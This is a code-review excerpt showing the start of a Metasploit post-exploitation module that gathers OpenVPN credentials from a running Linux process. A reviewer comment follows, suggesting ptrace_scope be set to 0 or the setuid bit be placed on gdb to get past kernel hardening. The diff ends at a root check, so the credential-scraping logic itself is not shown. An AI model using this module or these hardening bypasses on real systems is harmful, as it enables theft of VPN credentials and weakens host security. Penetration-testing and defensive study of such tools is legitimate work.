modules/post/linux/gather/openvpn_credentials.rb

```diff
@@ -0,0 +1,75 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit4 < Msf::Post
+
+  include Msf::Post::File
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'          => 'OpenVPN Gather Credentials',
+      'Description'   => %q{
+        This module grab OpenVPN credentials from a running process
+        in Linux.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        =>
+        [
+          'rvrsh3ll', # Discovery
+          'Roberto Soares Espreto <robertoespreto[at]gmail.com>', # Metasploit Module
+        ],
+      'Platform'      => ['linux'],
+      'SessionTypes'  => ['shell', 'meterpreter'],
+      'References'    => [
+        ['URL', 'https://gist.github.com/rvrsh3ll/cc93a0e05e4f7145c9eb#file-openvpnscraper-sh']
+      ]
+    ))
+
+    register_options(
+      [
+        OptInt.new('PID', [true, 'Process IDentifier to OpenVPN client.'])
+      ], self.class
+    )
+  end
+
+  def pid
+    datastore['PID']
+  end
+
+  def run
+    user = cmd_exec('/usr/bin/whoami')
+    print_good("Module running as \"#{user}\" user")
+
+    unless is_root? && user == 'root'
```

Comment:
@void-in Yes, need to be root. As @wvu-r7 appointed, the reason is the Kernel hardening stuff build into the Ubuntu kernel.
You would need to change the ```/proc/sys/kernel/yama/ptrace_scope``` file (with 0) to use sudo.
or
```sudo chmod +s /usr/bin/gdb```